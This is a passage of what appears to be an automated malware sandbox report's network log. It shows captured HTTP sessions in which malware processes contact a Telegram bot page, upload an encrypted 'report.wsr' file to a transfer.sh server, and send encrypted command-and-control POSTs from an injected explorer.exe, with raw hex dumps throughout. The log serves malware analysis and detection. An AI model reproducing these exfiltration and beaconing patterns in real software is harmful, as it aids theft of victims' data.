Nov 18, 2023 10:03:09.318027973 CET	47019	IN	Data Raw: 08 48 8b 54 24 10 4c 8b 44 24 20 48 8b 44 24 28 49 89 fa 4c 8d 5c 24 38 e9 df fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 7c 24 08 48 8b 54 24 10 4c 8b 44 24 18 48 8b 44 24 20 49 89 Data Ascii: HT$LD$ HD$(IL\$8H\|$HT$LD$HD$ IL\$(fHnf`f`fpH\|THH HDoftfu%HH9rHoftfuIH)HI8HtHFf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	149.154.167.99	80	192.168.2.4	49809	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:11.557492018 CET	49976	OUT	GET /cinoshibot HTTP/1.1 Host: t.me Connection: Keep-Alive
Nov 18, 2023 10:03:11.855333090 CET	50766	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 Date: Sat, 18 Nov 2023 09:03:11 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://t.me/cinoshibot Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.2.4	49809	149.154.167.99	80	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:11.557492018 CET	49976	OUT	GET /cinoshibot HTTP/1.1 Host: t.me Connection: Keep-Alive
Nov 18, 2023 10:03:11.855333090 CET	50766	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 Date: Sat, 18 Nov 2023 09:03:11 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://t.me/cinoshibot Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.2.4	49822	185.217.98.121	8080	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:17.245696068 CET	62106	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 185.217.98.121:8080 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:03:19.392728090 CET	65787	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/plain; charset=utf-8 Server: Transfer.sh HTTP Server X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Date: Sat, 18 Nov 2023 09:03:18 GMT Content-Length: 24 Connection: close Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a Data Ascii: Could not save metadata

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	185.217.98.121	8080	192.168.2.4	49822	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:17.245696068 CET	62106	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 185.217.98.121:8080 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:03:19.392728090 CET	65787	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/plain; charset=utf-8 Server: Transfer.sh HTTP Server X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Date: Sat, 18 Nov 2023 09:03:18 GMT Content-Length: 24 Connection: close Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a Data Ascii: Could not save metadata

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	185.217.98.121	80	192.168.2.4	49827	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:19.844208002 CET	66392	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 185.217.98.121 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:03:20.395795107 CET	66863	OUT	Data Raw: 57 53 52 24 dd e8 dd b7 d6 dc a5 83 a6 b7 ac 77 2b eb 6f 24 b2 18 c8 e5 70 79 12 c2 38 af f7 a7 e5 13 05 cc 8b db 9a 00 77 d6 e2 4d c1 11 2d 1d 36 cb 7c 28 c8 4a db bd 49 b9 19 a4 d9 0c 44 2c 5f 01 da ca 6e 00 6c 4c 8b ea c9 26 ad 94 26 61 12 9a Data Ascii: WSR$w+o$py8wM-6\|(JID,_nlL&&a}t_VI5d.WVWj-F/8f{Qa\/g4 Ci]`[q7HP(bn@Ad5hUIR7@D%&\|{F4"6v 'B)z{+a#-
Nov 18, 2023 10:03:20.743928909 CET	66901	OUT	Data Raw: 87 51 1b dc ed 65 dd d6 bc e4 67 a1 f2 3b 33 ec 96 aa c1 d8 a3 f0 14 e6 05 3f 0a 31 84 aa 5a bc c2 42 55 3b 27 41 80 71 40 fb c3 1e 62 4d c2 5b 9f ec 2e 40 cd 6e 09 49 a3 75 43 24 eb 23 c6 a4 29 1b 9b b8 a7 1e c7 99 9e cf a7 cc bb 6f 19 4b 23 5d Data Ascii: Qeg;3?1ZBU;'Aq@bM[.@nIuC$#)oK#]w_EJ*Z}6?qNC{5,)_<k-"lOkF'DqffxThs7fiJIch6;F#,O7m
Nov 18, 2023 10:03:21.092117071 CET	66944	OUT	Data Raw: d1 97 04 f6 f1 9e 46 67 43 3a 25 39 ac f3 44 bb 48 6c e4 97 29 ca 01 3b c6 b4 f4 7c 5d 96 e0 37 11 5d bd 7d 6f 2a 31 f3 0c 13 20 73 60 08 a1 5f aa a4 6f 3e 32 db c2 82 57 b3 02 5e b5 f9 da fb bd 54 2f b5 24 fe bf 48 08 c9 a7 86 2b 9e 33 01 3f 09 Data Ascii: FgC:%9DHl);\|]7]}o*1 s`_o>2W^T/$H+3?+AGMY.-=br5]+Rb9^1@dvdvu$Z:_?TGK(UsDX3BA{onGA/X.h9Izzg6\U
Nov 18, 2023 10:03:21.092298031 CET	66945	OUT	Data Raw: 47 d4 7f d4 a9 53 03 1e b5 69 b9 b4 c5 71 fd 23 f4 b6 58 f9 5d c1 3c cf 7c 3a 36 47 cb 6c 52 0b 5a 63 50 5b bc fc d9 8b 30 6d 11 78 ca c4 eb 41 df ac bc 1d ef 83 69 63 d7 a6 0a e8 0b b2 a5 1e e6 0c 8e 02 17 47 df 18 55 77 ec fe 4e 07 ae ad 6f 17 Data Ascii: GSiq#X]<\|:6GlRZcP[0mxAicGUwNo:vB3^t B7+,5Ek@cs<y3aT\)^R'}OxO3hru{&}cUs 0s(`@rT>%I\LIxr?.#
Nov 18, 2023 10:03:21.439970016 CET	66973	OUT	Data Raw: 0c f7 55 d5 36 c8 81 bd 89 d0 c9 80 72 06 f3 87 a7 48 69 1a 05 36 27 fe d3 d6 9d b7 52 8a b8 52 f6 09 b2 be d5 28 07 1a 37 e6 a9 67 2c 3c e1 53 1c 40 3b d9 db d8 13 5c f3 81 af 13 90 d9 6f 67 f6 e6 03 b2 e7 87 ac dd 13 0a 14 b4 16 97 6e d1 5c 09 Data Ascii: U6rHi6'RR(7g,<S@;\ogn\":oRS/vo\|q+Z9tnJE#Yd6Xn6hQ8M6;U%JBr\Pr}cl)8Xg4+pPri@$@t5L7WV;J
Nov 18, 2023 10:03:21.440134048 CET	66987	OUT	Data Raw: 96 c6 1c a7 7a 96 d7 a0 94 05 d5 5e b4 6a 0b 9d 6d 32 1d bb c1 ce f8 e4 5a fe 97 24 1d 90 b7 5d f6 ac 27 83 22 2a 28 a3 71 c9 b9 37 0d 54 51 5e be 7d d7 04 4a 8d 8c 45 2b 86 7e 30 30 7d c6 3f 8d ca 3e 1b 59 01 04 37 db da 98 eb e8 77 d0 dc f3 08 Data Ascii: z^jm2Z$]'"(q7TQ^}JE+~00}?>Y7w3uxl[nl}%THdi~7rU>ioH(wd%i=hCwc<CL=fHj`~ft`z;mGlt<
Nov 18, 2023 10:03:21.440464973 CET	66990	OUT	Data Raw: 46 7e a5 ee 48 64 dc 3d 34 6d e1 81 68 ec b5 12 93 f1 d5 30 04 8d 42 52 80 6a d8 2f 72 96 5d b1 41 2e 5f f8 25 5d 5a d1 4d dc d1 e3 a2 cf 18 63 05 1e a7 79 c0 62 06 37 d6 8d c9 50 ba 85 ff c8 bc 0e 93 62 1e 50 cd c9 b0 90 4c 82 2e 9c 31 a1 3c 77 Data Ascii: F~Hd=4mh0BRj/r]A._%]ZMcyb7PbPL.1<w\|w}{HBPU8]_vz4on?uF\M581`v7~Q^}K<)AtmQg.]$]f&sf"d>]#]m-ACD!P$[u:N
Nov 18, 2023 10:03:21.440519094 CET	66995	OUT	Data Raw: 50 81 62 2f 49 67 a4 ac a0 ae 29 aa 80 32 a4 7b fa ce f3 10 da d9 26 76 52 78 43 88 7d 27 12 9a bb b4 7f e3 fd 34 56 39 30 b7 df 7c 57 20 3f ab 7d 55 d1 ef 2c fe 94 72 63 85 74 d7 a5 88 23 88 53 5d 14 f1 2f 07 4f ee fd fe 4e c9 14 0a 0b c7 b8 b4 Data Ascii: Pb/Ig)2{&vRxC}'4V90\|W ?}U,rct#S]/ONy2ef8\|>X3(axddvlCTLatVLs<#s{gzB3;G7q~4?==z2;6-
Nov 18, 2023 10:03:21.440552950 CET	66997	OUT	Data Raw: cd 4e e5 68 44 31 e2 65 52 d4 3b 29 38 d1 dc fa c9 9a d3 6c 06 db 88 c3 1e 2b ce f3 e6 e2 22 22 77 a0 83 20 a3 28 9c a0 ba c2 45 57 c4 84 4d 38 4a ed 40 b7 6d 5d 9b 1c 96 2f b0 68 f0 fa f1 12 ff c4 ee 0f 4f 4a 72 38 26 c8 5a f6 44 41 29 d7 af 1d Data Ascii: NhD1eR;)8l+""w (EWM8J@m]/hOJr8&ZDA)r4P\|6tfQ\ T.?cCUP$CqE}N<,($}Le4,jcAt&KW_jX\QSPE>kavAE]9hex~Q
Nov 18, 2023 10:03:21.440584898 CET	67000	OUT	Data Raw: b4 5c f1 35 b5 29 aa 97 c6 fc 94 28 e2 b5 a2 8a 5f 19 e9 6f f9 85 80 74 12 23 ee fd 34 d3 73 e4 48 4d 66 36 f4 71 84 a7 56 44 7b a2 c5 b3 8e 30 13 86 c8 94 02 3e d4 89 b6 7f b4 18 8b e8 0a b1 f4 99 14 3b bb 4b 26 97 64 b6 c5 e9 93 80 3b ba fb 0e Data Ascii: \5)(_ot#4sHMf6qVD{0>;K&d;c@rQoQ>54wVfL1M$Y/[[i]D`j@wpd3iC2K:l,tM/NQK`SWrC-{V)w:oXN$1W&eD
Nov 18, 2023 10:03:21.794925928 CET	67013	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/plain; charset=utf-8 Server: Transfer.sh HTTP Server X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Date: Sat, 18 Nov 2023 09:03:21 GMT Content-Length: 24 Connection: close Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a Data Ascii: Could not save metadata

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.2.4	49827	185.217.98.121	80	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:19.844208002 CET	66392	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 185.217.98.121 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:03:20.395795107 CET	66863	OUT	Data Raw: 57 53 52 24 dd e8 dd b7 d6 dc a5 83 a6 b7 ac 77 2b eb 6f 24 b2 18 c8 e5 70 79 12 c2 38 af f7 a7 e5 13 05 cc 8b db 9a 00 77 d6 e2 4d c1 11 2d 1d 36 cb 7c 28 c8 4a db bd 49 b9 19 a4 d9 0c 44 2c 5f 01 da ca 6e 00 6c 4c 8b ea c9 26 ad 94 26 61 12 9a Data Ascii: WSR$w+o$py8wM-6\|(JID,_nlL&&a}t_VI5d.WVWj-F/8f{Qa\/g4 Ci]`[q7HP(bn@Ad5hUIR7@D%&\|{F4"6v 'B)z{+a#-
Nov 18, 2023 10:03:20.743928909 CET	66901	OUT	Data Raw: 87 51 1b dc ed 65 dd d6 bc e4 67 a1 f2 3b 33 ec 96 aa c1 d8 a3 f0 14 e6 05 3f 0a 31 84 aa 5a bc c2 42 55 3b 27 41 80 71 40 fb c3 1e 62 4d c2 5b 9f ec 2e 40 cd 6e 09 49 a3 75 43 24 eb 23 c6 a4 29 1b 9b b8 a7 1e c7 99 9e cf a7 cc bb 6f 19 4b 23 5d Data Ascii: Qeg;3?1ZBU;'Aq@bM[.@nIuC$#)oK#]w_EJ*Z}6?qNC{5,)_<k-"lOkF'DqffxThs7fiJIch6;F#,O7m
Nov 18, 2023 10:03:21.092117071 CET	66944	OUT	Data Raw: d1 97 04 f6 f1 9e 46 67 43 3a 25 39 ac f3 44 bb 48 6c e4 97 29 ca 01 3b c6 b4 f4 7c 5d 96 e0 37 11 5d bd 7d 6f 2a 31 f3 0c 13 20 73 60 08 a1 5f aa a4 6f 3e 32 db c2 82 57 b3 02 5e b5 f9 da fb bd 54 2f b5 24 fe bf 48 08 c9 a7 86 2b 9e 33 01 3f 09 Data Ascii: FgC:%9DHl);\|]7]}o*1 s`_o>2W^T/$H+3?+AGMY.-=br5]+Rb9^1@dvdvu$Z:_?TGK(UsDX3BA{onGA/X.h9Izzg6\U
Nov 18, 2023 10:03:21.092298031 CET	66945	OUT	Data Raw: 47 d4 7f d4 a9 53 03 1e b5 69 b9 b4 c5 71 fd 23 f4 b6 58 f9 5d c1 3c cf 7c 3a 36 47 cb 6c 52 0b 5a 63 50 5b bc fc d9 8b 30 6d 11 78 ca c4 eb 41 df ac bc 1d ef 83 69 63 d7 a6 0a e8 0b b2 a5 1e e6 0c 8e 02 17 47 df 18 55 77 ec fe 4e 07 ae ad 6f 17 Data Ascii: GSiq#X]<\|:6GlRZcP[0mxAicGUwNo:vB3^t B7+,5Ek@cs<y3aT\)^R'}OxO3hru{&}cUs 0s(`@rT>%I\LIxr?.#
Nov 18, 2023 10:03:21.439970016 CET	66973	OUT	Data Raw: 0c f7 55 d5 36 c8 81 bd 89 d0 c9 80 72 06 f3 87 a7 48 69 1a 05 36 27 fe d3 d6 9d b7 52 8a b8 52 f6 09 b2 be d5 28 07 1a 37 e6 a9 67 2c 3c e1 53 1c 40 3b d9 db d8 13 5c f3 81 af 13 90 d9 6f 67 f6 e6 03 b2 e7 87 ac dd 13 0a 14 b4 16 97 6e d1 5c 09 Data Ascii: U6rHi6'RR(7g,<S@;\ogn\":oRS/vo\|q+Z9tnJE#Yd6Xn6hQ8M6;U%JBr\Pr}cl)8Xg4+pPri@$@t5L7WV;J
Nov 18, 2023 10:03:21.440134048 CET	66987	OUT	Data Raw: 96 c6 1c a7 7a 96 d7 a0 94 05 d5 5e b4 6a 0b 9d 6d 32 1d bb c1 ce f8 e4 5a fe 97 24 1d 90 b7 5d f6 ac 27 83 22 2a 28 a3 71 c9 b9 37 0d 54 51 5e be 7d d7 04 4a 8d 8c 45 2b 86 7e 30 30 7d c6 3f 8d ca 3e 1b 59 01 04 37 db da 98 eb e8 77 d0 dc f3 08 Data Ascii: z^jm2Z$]'"(q7TQ^}JE+~00}?>Y7w3uxl[nl}%THdi~7rU>ioH(wd%i=hCwc<CL=fHj`~ft`z;mGlt<
Nov 18, 2023 10:03:21.440464973 CET	66990	OUT	Data Raw: 46 7e a5 ee 48 64 dc 3d 34 6d e1 81 68 ec b5 12 93 f1 d5 30 04 8d 42 52 80 6a d8 2f 72 96 5d b1 41 2e 5f f8 25 5d 5a d1 4d dc d1 e3 a2 cf 18 63 05 1e a7 79 c0 62 06 37 d6 8d c9 50 ba 85 ff c8 bc 0e 93 62 1e 50 cd c9 b0 90 4c 82 2e 9c 31 a1 3c 77 Data Ascii: F~Hd=4mh0BRj/r]A._%]ZMcyb7PbPL.1<w\|w}{HBPU8]_vz4on?uF\M581`v7~Q^}K<)AtmQg.]$]f&sf"d>]#]m-ACD!P$[u:N
Nov 18, 2023 10:03:21.440519094 CET	66995	OUT	Data Raw: 50 81 62 2f 49 67 a4 ac a0 ae 29 aa 80 32 a4 7b fa ce f3 10 da d9 26 76 52 78 43 88 7d 27 12 9a bb b4 7f e3 fd 34 56 39 30 b7 df 7c 57 20 3f ab 7d 55 d1 ef 2c fe 94 72 63 85 74 d7 a5 88 23 88 53 5d 14 f1 2f 07 4f ee fd fe 4e c9 14 0a 0b c7 b8 b4 Data Ascii: Pb/Ig)2{&vRxC}'4V90\|W ?}U,rct#S]/ONy2ef8\|>X3(axddvlCTLatVLs<#s{gzB3;G7q~4?==z2;6-
Nov 18, 2023 10:03:21.440552950 CET	66997	OUT	Data Raw: cd 4e e5 68 44 31 e2 65 52 d4 3b 29 38 d1 dc fa c9 9a d3 6c 06 db 88 c3 1e 2b ce f3 e6 e2 22 22 77 a0 83 20 a3 28 9c a0 ba c2 45 57 c4 84 4d 38 4a ed 40 b7 6d 5d 9b 1c 96 2f b0 68 f0 fa f1 12 ff c4 ee 0f 4f 4a 72 38 26 c8 5a f6 44 41 29 d7 af 1d Data Ascii: NhD1eR;)8l+""w (EWM8J@m]/hOJr8&ZDA)r4P\|6tfQ\ T.?cCUP$CqE}N<,($}Le4,jcAt&KW_jX\QSPE>kavAE]9hex~Q
Nov 18, 2023 10:03:21.440584898 CET	67000	OUT	Data Raw: b4 5c f1 35 b5 29 aa 97 c6 fc 94 28 e2 b5 a2 8a 5f 19 e9 6f f9 85 80 74 12 23 ee fd 34 d3 73 e4 48 4d 66 36 f4 71 84 a7 56 44 7b a2 c5 b3 8e 30 13 86 c8 94 02 3e d4 89 b6 7f b4 18 8b e8 0a b1 f4 99 14 3b bb 4b 26 97 64 b6 c5 e9 93 80 3b ba fb 0e Data Ascii: \5)(_ot#4sHMf6qVD{0>;K&d;c@rQoQ>54wVfL1M$Y/[[i]D`j@wpd3iC2K:l,tM/NQK`SWrC-{V)w:oXN$1W&eD
Nov 18, 2023 10:03:21.794925928 CET	67013	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/plain; charset=utf-8 Server: Transfer.sh HTTP Server X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Date: Sat, 18 Nov 2023 09:03:21 GMT Content-Length: 24 Connection: close Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a Data Ascii: Could not save metadata

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	194.49.94.210	80	192.168.2.4	49833	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:22.968334913 CET	67024	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tbfnyxobqor.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 186 Host: 194.49.94.210
Nov 18, 2023 10:03:22.968383074 CET	67024	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af aa d5 f3 c9 39 df 28 fc f4 5c 9a 69 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(\i.t]gz_g'CsX]M8(YpJx:TMB;;xdOC5{3X 8gD,xs6~~@
Nov 18, 2023 10:03:23.286901951 CET	67032	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:03:23.303277016 CET	67032	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qpdgiqckodsdd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: 194.49.94.210
Nov 18, 2023 10:03:23.303359032 CET	67033	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af ab d5 f3 c9 38 df 28 fc 94 59 ad 4d Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(YMS5`%-.4rY7iuMS$3I+H+g5F#Y?2=\|KS<9HN%3nw:ib^U>to.lhVK Sd3*($Vp&lhu(t$7kn
Nov 18, 2023 10:03:23.617351055 CET	67048	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:03:23.658828020 CET	67048	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bknwnekkxjnwlw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: 194.49.94.210
Nov 18, 2023 10:03:23.658873081 CET	67048	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a8 d5 f3 c9 38 df 28 fc 88 3a fb 2a Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(:'TndQ#pK@BfB
Nov 18, 2023 10:03:23.971730947 CET	67075	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 53 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a3 92 72 ac a5 2b 5d dc 09 ba 16 3c f2 40 92 cc 4f 96 fd ab 6a a6 92 Data Ascii: H>99$JY@kj@r+]<@Oj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.2.4	49833	194.49.94.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
